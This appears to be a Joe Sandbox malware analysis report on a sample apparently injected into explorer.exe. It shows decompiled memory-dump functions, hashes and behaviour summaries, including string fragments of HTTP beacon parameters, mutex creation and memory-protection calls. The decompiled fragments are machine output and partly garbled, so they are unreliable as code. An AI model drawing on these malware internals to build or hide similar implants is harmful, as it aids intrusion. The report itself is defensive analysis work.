                            				_push( &_v48);
                            				_push(8);
                            				_push(0x20402);
                            				return L0175B640(E01759AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25,  *_t12 & 0x000000ff);
                            			}














                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 862b7327472d391b039525824099cd35d459a350464d7a2936181f3a9e091f50
                            • Instruction ID: 069aafb4126890251afdd207db032f9dc9a946b432d711f0e56d781697a16c7c
                            • Opcode Fuzzy Hash: 862b7327472d391b039525824099cd35d459a350464d7a2936181f3a9e091f50
                            • Instruction Fuzzy Hash: 9DF0B470E0460C9FDB14EFB8D449A6EF7F4EF18300F508099E905EB291EA34D900CB54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E017D2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                            				void* __esi;
                            				signed char _t3;
                            				signed char _t7;
                            				void* _t19;
                            
                            				_t17 = __ecx;
                            				_t3 = E017CFD22(__ecx);
                            				_t19 =  *0x180849c - _t3; // 0x18e02eca
                            				if(_t19 == 0) {
                            					__eflags = _t17 -  *0x1808748; // 0x0
                            					if(__eflags <= 0) {
                            						L017D1C06();
                            						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                            						__eflags = _t3;
                            						if(_t3 != 0) {
                            							L5:
                            							__eflags =  *0x1808724 & 0x00000004;
                            							if(( *0x1808724 & 0x00000004) == 0) {
                            								asm("int3");
                            								return _t3;
                            							}
                            						} else {
                            							_t3 =  *0x7ffe02d4 & 0x00000003;
                            							__eflags = _t3 - 3;
                            							if(_t3 == 3) {
                            								goto L5;
                            							}
                            						}
                            					}
                            					return _t3;
                            				} else {
                            					_t7 =  *0x1808724; // 0x0
                            					return E017C8DF1(__ebx, 0xc0000374, 0x1805890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                            				}
                            			}








                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1aba924fbcc523346adb9c03007531214d11f8ccfd8aa278e6e9821885a4caa6
                            • Instruction ID: 1253dff91a9d9192d70d6ca454d3abb63dd5e6f14a9dd076093f35c714a79908
                            • Opcode Fuzzy Hash: 1aba924fbcc523346adb9c03007531214d11f8ccfd8aa278e6e9821885a4caa6
                            • Instruction Fuzzy Hash: C2F0A02A81618D4ADFB36B2865152E2ABE6D756210B0E1489D9906760EC534CAD3CF25
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 54%
                            			E0175927A(void* __ecx) {
                            				signed int _t11;
                            				void* _t14;
                            
                            				_t11 = L01734620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                            				if(_t11 != 0) {
                            					E0175FA60(_t11, 0, 0x98);
                            					asm("movsd");
                            					asm("movsd");
                            					asm("movsd");
                            					asm("movsd");
                            					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                            					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                            					E017592C6(_t11, _t14);
                            				}
                            				return _t11;
                            			}






                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                            • Instruction ID: 6a5e8527b7c42203b9cd8589c59713d05dbfe9e354e20cb2232497b1adcd0358
                            • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                            • Instruction Fuzzy Hash: 62E02B32340541ABE7519E09CC84F03B75DDFD2724F004078FA001F242C6F5DD0887A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 62%
                            			E017E8B58(intOrPtr __ecx) {
                            				signed int _v8;
                            				intOrPtr _v20;
                            				short _v46;
                            				char _v52;
                            				signed char* _t11;
                            				void* _t17;
                            				void* _t22;
                            				void* _t23;
                            				void* _t24;
                            				signed int _t25;
                            
                            				_v8 =  *0x180d360 ^ _t25;
                            				_v20 = __ecx;
                            				_v46 = 0x1c26;
                            				if(E01737D50() == 0) {
                            					_t11 = 0x7ffe0386;
                            				} else {
                            					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                            				}
                            				_push( &_v52);
                            				_push(4);
                            				_push(0x402);
                            				return L0175B640(E01759AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24,  *_t11 & 0x000000ff);
                            			}














                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ddf5913497f214d191dfa09ee9ac57b00da66d309ced7935a99918a841e5eea6
                            • Instruction ID: bb1b29d1c4ddf801cbb421eda9229103ccf9f78f2cb25ecc6e53d116d18a60f3
                            • Opcode Fuzzy Hash: ddf5913497f214d191dfa09ee9ac57b00da66d309ced7935a99918a841e5eea6
                            • Instruction Fuzzy Hash: 74F05EB0A14259ABDB14EBA8D90AA6EB7E4EB08300F440499AA059B291EA74D900C795
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 79%
                            			E0171F358(void* __ecx, signed int __edx) {
                            				char _v8;
                            				signed int _t9;
                            				void* _t20;
                            
                            				_push(__ecx);
                            				_t9 = 2;
                            				_t20 = 0;
                            				if(E0174F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                            					_t20 = L01734620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                            				}
                            				return _t20;
                            			}







                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                            • Instruction ID: ea6656d8dae7b0165d48ac4d78323326fcaf7b15683d928e6442c1398b3e6885
                            • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                            • Instruction Fuzzy Hash: C5E0D832A40118FBDB219ADD9D06F5AFFACDB54A60F000155FA04D7154D5609D00D2D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 82%
                            			E017A41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                            				void* _t5;
                            				void* _t14;
                            
                            				_push(8);
                            				_push(0x17f08f0);
                            				_t5 = E0176D08C(__ebx, __edi, __esi);
                            				if( *0x18087ec == 0) {
                            					L0172EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                            					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                            					if( *0x18087ec == 0) {
                            						 *0x18087f0 = 0x18087ec;
                            						 *0x18087ec = 0x18087ec;
                            						 *0x18087e8 = 0x18087e4;
                            						 *0x18087e4 = 0x18087e4;
                            					}
                            					 *(_t14 - 4) = 0xfffffffe;
                            					_t5 = L017A4248();
                            				}
                            				return E0176D0D1(_t5);
                            			}






                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d95940b8b7c2a6a940b65a33fd0b57ebf12d1f3431b643c5f6116bb30409dd11
                            • Instruction ID: 393822bf26f544b86f4fd84fdd0df43031efb09693f11a52fe816a1ea908ef1f
                            • Opcode Fuzzy Hash: d95940b8b7c2a6a940b65a33fd0b57ebf12d1f3431b643c5f6116bb30409dd11
                            • Instruction Fuzzy Hash: 22F0F278D607098FCBF3EBA9D908704B6A4F79B311F40422A91118628DC77446E5CF05
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E017CD380(void* __ecx, void* __edx, intOrPtr _a4) {
                            				void* _t5;
                            
                            				if(_a4 != 0) {
                            					_t5 = L0171E8B0(__ecx, _a4, 0xfff);
                            					L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                            					return _t5;
                            				}
                            				return 0xc000000d;
                            			}





                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                            • Instruction ID: 87f97f0826c2eced8d5ad9954fd57c0645e88de6adf1d6415094aa2b449cc6d3
                            • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                            • Instruction Fuzzy Hash: 88E0C231281209FBDB335E88CC00F69FB16DB50BA0F104039FE085A691CA719D91D6C4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0174A185() {
                            				void* __ecx;
                            				intOrPtr* _t5;
                            
                            				if( *0x18067e4 >= 0xa) {
                            					if(_t5 < 0x1806800 || _t5 >= 0x1806900) {
                            						return L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                            					} else {
                            						goto L1;
                            					}
                            				} else {
                            					L1:
                            					return E01730010(0x18067e0, _t5);
                            				}
                            			}






                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 382c016f2c8a3cfda63037656634ca79ee3c867ea25d75373df8abb3e9102f2a
                            • Instruction ID: 78a2d59528e386badaff6e1a1efed846c8c7e28fefcd24e9ca02f4e103df72f7
                            • Opcode Fuzzy Hash: 382c016f2c8a3cfda63037656634ca79ee3c867ea25d75373df8abb3e9102f2a
                            • Instruction Fuzzy Hash: BED05B615A10085BE66F57109D58B25B666F7C5750F34450DF3078B9D6FB5089F8D108
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E017953CA(void* __ebx) {
                            				intOrPtr _t7;
                            				void* _t13;
                            				void* _t14;
                            				intOrPtr _t15;
                            				void* _t16;
                            
                            				_t13 = __ebx;
                            				if( *((char*)(_t16 - 0x65)) != 0) {
                            					E0172EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                            					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                            					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                            				}
                            				if(_t15 != 0) {
                            					L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                            					return  *((intOrPtr*)(_t16 - 0x64));
                            				}
                            				return _t7;
                            			}









                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                            • Instruction ID: 2f1103436f134002dbda1a220d66df1731d6ef533e39120fb055fb380ca5d004
                            • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                            • Instruction Fuzzy Hash: CDE08272A006849BDF13EB8CCA94F4EFBF9FB84B00F180018A4086B621CA24AC00CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 50%
                            			E00A87B1A(void* __ebx, signed int __ecx) {
                            				void* _t5;
                            				void* _t13;
                            
                            				asm("into");
                            				 *((intOrPtr*)(__ebx + 0x215881a0)) =  *((intOrPtr*)(__ebx + 0x215881a0)) + _t13;
                            				asm("bound edx, [esi-0x58]");
                            				 *(_t5 + 0x6482d7f9) =  *(_t5 + 0x6482d7f9) & __ecx;
                            				return 1;
                            			}






                            Memory Dump Source
                            • Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true
                            • Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 265e16fa52d44e05f6aad4580cc100f22d80145863e04c5120d032b76090b41d
                            • Instruction ID: 4e0b6b7b539f010fa3c1ee15df0d61fd7574ab6b329fc7107c6726d7c346bfc8
                            • Opcode Fuzzy Hash: 265e16fa52d44e05f6aad4580cc100f22d80145863e04c5120d032b76090b41d
                            • Instruction Fuzzy Hash: 74C01233A1A2488FE3308D18E881674FBA5DB53225F1553DBD804A7555965688558288
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0172AAB0() {
                            				intOrPtr* _t4;
                            
                            				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                            				if(_t4 != 0) {
                            					if( *_t4 == 0) {
                            						goto L1;
                            					} else {
                            						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                            					}
                            				} else {
                            					L1:
                            					return 0x7ffe0030;
                            				}
                            			}





                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                            • Instruction ID: 419165708b8e17209d6500724f7cb6f482f682c54525953b1c7f2ff57e632a0f
                            • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                            • Instruction Fuzzy Hash: 61D0E935352990CFEA17CB1DC554B1577B5BB44B84FC50490E501CBB62E62DD945CA00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0179A537(intOrPtr _a4, intOrPtr _a8) {
                            
                            				return L01738E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                            			}



                            0x0179a553

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                            • Instruction ID: 8c15f360a2b648082346dcfbe6e352684d959728ce2e4746124adf8f1770a871
                            • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                            • Instruction Fuzzy Hash: F4C08C33080248BBCB126F82CC00F06BF2AFBA8B60F008010FA080B571C632E970EB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0171DB40() {
                            				signed int* _t3;
                            				void* _t5;
                            
                            				_t3 = L01734620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                            				if(_t3 == 0) {
                            					return 0;
                            				} else {
                            					 *_t3 =  *_t3 | 0x00000400;
                            					return _t3;
                            				}
                            			}






                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                            • Instruction ID: c357bfa4426c50d1318428b26ceb1305d4441fd2375e11304101a1696f7db7e0
                            • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                            • Instruction Fuzzy Hash: 23C08C30280A01EAEB361F28CD01B00BAA0BB50B01F4400A06302DA0F4DB78DC02EA00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0171AD30(intOrPtr _a4) {
                            
                            				return L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                            			}



                            0x0171ad49

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                            • Instruction ID: 67cd231b926ea2b8cc998dfcc192a8bdfc19479349083dfc68019f2fb0f12732
                            • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                            • Instruction Fuzzy Hash: E9C08C32080248BBC7126A45CD00F01BB29E7A0B60F000020B6040A6628932E860D588
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E01733A1C(intOrPtr _a4) {
                            				void* _t5;
                            
                            				return L01734620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                            			}




                            0x01733a35

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                            • Instruction ID: 382ec75915fc408f00311de3aaad8c8b9bc298a5abf2cd475d9eecf32be616be
                            • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                            • Instruction Fuzzy Hash: 5BC08C32080648FBC7126E41DC00F01BB29E7A0B60F000020B6040A5618532EC60E588
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E01737D50() {
                            				intOrPtr* _t3;
                            
                            				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                            				if(_t3 != 0) {
                            					return  *_t3;
                            				} else {
                            					return _t3;
                            				}
                            			}





                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                            • Instruction ID: ad934e7a889138d4d6485a0ee43d7170377bbed749e001f5d936430f85e04615
                            • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                            • Instruction Fuzzy Hash: 06B092753119408FCE1ADF18C084B1573E4BB84A40B8400D0E400CBA22D329E8408900
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E01742ACB() {
                            				void* _t5;
                            
                            				return E0172EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                            			}




                            0x01742adc

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                            • Instruction ID: 3b8f97781e3615b3d8dce454d6dca0c736cf0462ee2691cc0d975f07b90a386a
                            • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                            • Instruction Fuzzy Hash: 14B01233C10451CFCF02EF44C610F19B331FB00750F0544A0D00127930C628AC02CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:2.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:4.6%
                            Total number of Nodes:457
                            Total number of Limit Nodes:18

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_10000000_explorer.jbxd
                            Similarity
                            • API ID: getaddrinforecvsetsockopt
                            • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                            • API String ID: 1564272048-1117930895
                            • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                            • Instruction ID: 61629a497fcc3155daa9096da6700adca4ca437e32f8259f1125d465a2882943
                            • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                            • Instruction Fuzzy Hash: FC528E34618B488FC759EF68C4847EAB7E2FB55300F51462ED49FC7246DE30A949CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_10000000_explorer.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID: `
                            • API String ID: 823142352-2679148245
                            • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                            • Instruction ID: 2bdc9d96369f93b16e86e8001beb34f57eddeb86a61b1746d95a84406af36c44
                            • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                            • Instruction Fuzzy Hash: C5224C70A18B099FCB99DF68C8956AEF7E1FB58301F51022EE45ED3250DB30EA51CB85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • NtProtectVirtualMemory.NTDLL ref: 100D9E67
                            Memory Dump Source
                            • Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_10000000_explorer.jbxd
                            Similarity
                            • API ID: MemoryProtectVirtual
                            • String ID:
                            • API String ID: 2706961497-0
                            • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                            • Instruction ID: 4bd378a53492687e96e9a7e7f160b667b9bc8cb5baa94df075d782f50c11c3d7
                            • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                            • Instruction Fuzzy Hash: 8901B134628B884F8788EFACD48112AB7E4FBCD314F000B3EE99AC3250EB70C5414752
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • NtProtectVirtualMemory.NTDLL ref: 100D9E67
                            Memory Dump Source
                            • Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_10000000_explorer.jbxd
                            Similarity
                            • API ID: MemoryProtectVirtual
                            • String ID:
                            • API String ID: 2706961497-0
                            • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                            • Instruction ID: 3dea6da0ef71eb3504788102b3450630c06aca71dab3dcc190888c6fc18e4a99
                            • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                            • Instruction Fuzzy Hash: 8F01A234628B884B8748EB6C94512A6B3E5FBCE314F000B3EE9DAC3241DB21D5024782
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • ObtainUserAgentString.URLMON ref: 100D39A0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_10000000_explorer.jbxd
                            Similarity
                            • API ID: AgentObtainStringUser
                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                            • API String ID: 2681117516-319646191
                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                            • Instruction ID: 7136ac166f45d8fa842b505d2e04c8568701d46e609c3fbc086b8f5a222ae2f2
                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                            • Instruction Fuzzy Hash: CC31D131614B0C8BCB44EFA8C8857EEBBE5FB58205F40422AE54ED7341DF789A45C79A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • ObtainUserAgentString.URLMON ref: 100D39A0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_10000000_explorer.jbxd
                            Similarity
                            • API ID: AgentObtainStringUser
                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                            • API String ID: 2681117516-319646191
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 232 100cfb66-100cfb68 233 100cfb6a-100cfb6b 232->233 234 100cfb93-100cfbb8 232->234 236 100cfb6d-100cfb71 233->236 237 100cfbbe-100cfc22 call 100d6612 call 100d8942 * 2 233->237 235 100cfbbb-100cfbbc 234->235 235->237 236->235 238 100cfb73-100cfb92 236->238 246 100cfcdc 237->246 247 100cfc28-100cfc2b 237->247 238->234 248 100cfcde-100cfcf6 246->248 247->246 249 100cfc31-100cfcd3 call 100dada4 call 100da022 call 100da3e2 call 100da022 call 100da3e2 CreateMutexW 247->249 249->246 263 100cfcd5-100cfcda 249->263 263->248
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_10000000_explorer.jbxd
                            Similarity
                            • API ID: CreateMutex
                            • String ID: .dll$el32$kern
                            • API String ID: 1964310414-1222553051
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_10000000_explorer.jbxd
                            Similarity
                            • API ID: CreateMutex
                            • String ID: .dll$el32$kern
                            • API String ID: 1964310414-1222553051
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 293 100d572e-100d5768 294 100d5788-100d57ab connect 293->294 295 100d576a-100d5782 call 100d8942 293->295 295->294
                            APIs
                            Strings
                            Memory Dump Source
